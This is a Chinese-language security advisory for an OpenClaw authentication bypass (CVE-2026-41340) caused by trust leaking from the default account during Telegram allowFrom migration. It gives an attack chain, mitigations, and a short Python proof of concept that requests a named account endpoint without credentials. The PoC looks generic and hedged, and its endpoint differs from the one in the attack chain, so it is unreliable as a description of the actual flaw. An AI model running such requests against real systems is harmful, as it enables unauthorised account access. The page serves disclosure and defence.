CVE-2026-41340 CVSS 6.5 中危

CVE-2026-41340 OpenClaw身份验证绕过漏洞

披露日期: 2026-04-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41340

漏洞类型

身份验证绕过

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.3.31之前的版本中存在严重的身份验证边界漏洞。由于Telegram遗留allowFrom迁移机制存在逻辑错误，系统错误地将默认账户的信任权限扩展到了所有命名账户。这使得攻击者能够利用这一信任传播缺陷，在无需认证的情况下绕过安全控制，直接获取对特定命名账户的未授权访问权限，对系统数据机密性和完整性构成威胁。

技术细节

该漏洞源于OpenClaw在处理Telegram遗留配置迁移过程中的逻辑缺陷。具体而言，当系统执行`allowFrom`迁移操作时，未能正确隔离不同账户的信任上下文，导致默认账户（default-account）所拥有的信任关系被错误地继承或“广播”到了系统中所有存在的命名账户。由于该漏洞的攻击向量为网络（AV:N），且不需要用户交互（UI:N）和预先认证（PR:N），远程攻击者可以轻易地利用这一机制。攻击者只需发送针对特定命名账户的请求，系统便会因错误的信任传播将其误认为合法的默认账户上下文，从而允许其通过身份验证检查。最终，攻击者可成功访问受限账户，读取敏感信息或破坏数据完整性。这一过程完全绕过了针对命名账户原本应有的身份验证流程，使得系统处于极高风险之中。

攻击链分析

STEP 1

1. 信息收集

攻击者识别网络上运行OpenClaw且版本低于2026.3.31的目标实例。

STEP 2

2. 发起攻击

攻击者无需任何认证凭据，直接向目标系统上特定的命名账户端点（如/api/accounts/admin）发送网络请求。

STEP 3

3. 信任利用

由于系统存在错误的信任传播（allowFrom迁移缺陷），系统错误地将请求视为来自受信任的默认账户，从而绕过身份验证检查。

STEP 4

4. 获取权限

攻击者成功获取命名账户的访问权限，能够读取敏感数据（C:L）或修改配置（I:L）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-41340
# This script demonstrates bypassing authentication for named accounts
# due to the incorrect trust inheritance from the default account.

import requests

target = "http://target-openclaw-instance.com"
named_account = "admin" # Target named account

# Vulnerability: The system incorrectly propagates trust from the default account
# to named accounts during Telegram legacy allowFrom migration.

# In a real scenario, the attacker might not need a token if the trust is implicit,
# or might use the default account's token to access the named account endpoint.
headers = {
    "User-Agent": "CVE-2026-41340-POC",
    "Content-Type": "application/json"
}

print(f"[*] Attempting to access named account '{named_account}'...")

# Try to access the named account endpoint leveraging the trust propagation
url = f"{target}/api/v1/accounts/{named_account}"

try:
    response = requests.get(url, headers=headers, timeout=10)
    
    if response.status_code == 200:
        print(f"[+] SUCCESS: Authentication bypassed.")
        print(f"[+] Response: {response.text}")
    else:
        print(f"[-] FAILED: Status code {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

OpenClaw < 2026.3.31

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用OpenClaw中的Telegram遗留功能或相关迁移组件。同时，在网络层面部署WAF规则，拦截针对账户端点的异常未授权请求，并加强对命名账户的异常登录监控。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表